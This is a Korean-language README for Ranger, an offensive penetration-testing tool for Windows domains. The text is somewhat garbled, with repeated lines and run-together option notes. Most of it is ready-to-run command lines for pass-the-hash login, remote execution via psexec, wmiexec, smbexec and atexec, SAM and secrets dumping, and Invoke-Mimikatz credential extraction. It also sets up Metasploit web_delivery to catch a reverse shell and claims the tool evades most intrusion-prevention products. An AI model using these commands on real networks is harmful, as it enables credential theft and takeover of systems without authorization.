
보안 전문가가 원격 Microsoft Windows 기반 시스템에 접근하고 상호 작용할 수 있는 도구입니다.
보안 전문가가 원격 Microsoft Windows 기반 시스템에 접근하고 상호작용할 수 있도록 지원하는 도구입니다.
이 프로젝트는 "우리가 활이나 화살을 발명한 것이 아니라, 더 효율적으로 사용하는 방법을 고안했다"는 생각에서 구상되었습니다.
Ranger는 명령줄 기반의 공격 및 침투 테스트 도구로, 인스턴트화된 투석기 서버를 사용하여 Windows 시스템에 기능을 전달할 수 있습니다. 사용자가 자격 증명 세트나 해시 세트(NTLM, LM, LM:NTLM)를 가지고 있으면 트러스트에 속한 시스템에 접근할 수 있습니다.
이 기능을 사용하여 보안 전문가는 메모리에서 자격 증명을 평문으로 추출하고, SAM 테이블에 접근하며, 명령을 실행하고, PowerShell 스크립트, Windows 바이너리 및 기타 도구를 실행할 수 있습니다. 현재 이 도구는 이를 탐지하도록 맞춤 조정되지 않은 한 대부분의 IPS 벤더 솔루션을 우회합니다. 이 도구는 합법적이거나 계약에 따라 지원되는 활동을 수행하는 보안 전문가를 지원하기 위해 홈 랩에서 개발되었습니다.
더 많은 기능이 추가되고 있지만, 현재 이 도구는 PowerShell PowerView, PowerShell Mimikatz 및 Impacket 팀 관련 저장소의 커뮤니티 기여를 사용합니다.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership을 사용하여 실제 쿼리 도메인이 무엇인지 확인하십시오.--domain을 사용하면 로그인한 도메인과 다른 도메인을 대상으로 지정할 수 있습니다.ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d로 도메인 이름을 제공하면 파일의 모든 도메인 이름을 무시하겠다는 의미로 간주됩니다.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xmlt를 e로 바꾸면 됩니다.-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-f로 변경할 수 있습니다.-a로 변경할 수 있습니다.-f와 -a 옵션이 모두 필요합니다. -a를 사용하지 않으려면 Executor를 사용할 수 있습니다.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x로 식별해야 합니다.-f로 정의해야 합니다.-a로 명령을 추가로 정의할 수 있습니다.-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCredsuse exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j
##FAQ
WORKGROUP의 일부인 Windows 시스템에서 액세스 거부 오류가 발생합니다.
도메인의 일부가 아닌 경우 Windows는 기본적으로 관리 공유를 가지고 있지 않습니다. SMBEXEC는 공유가 활성화되어 있어야 합니다. 또한 WORKGROUP 시스템에서는 WMIC가 활성화되어 있지 않습니다. SMBEXEC 및 WMIEXEC는 도메인 시스템에서 활성화된 프로토콜을 대상으로 하도록 만들어졌습니다. 이러한 기능을 WORKGROUP 시스템에서 활성화하는 것이 가능하지만, 취약한 프로토콜을 도입하는 것임을 명심하십시오(결국 이것이 이 도구가 공격하기 위해 만들어진 것입니다). 배우자가 Facebook을 사용하는 주 가정 시스템에서 이러한 기능을 활성화하는 것은 아마도 좋은 생각이 아닙니다.
enum4linux 같은 도구를 사용한 다음 ranger에서 --share share_name 인수를 사용하여 SMBEXEC를 실행해 볼 수 있습니다.https://pypi.python.org/pypi/colorama를 사용하여 색상 출력 계속 추가[BSides Charm City 2016: 2016년 4월 23일] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[Video] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)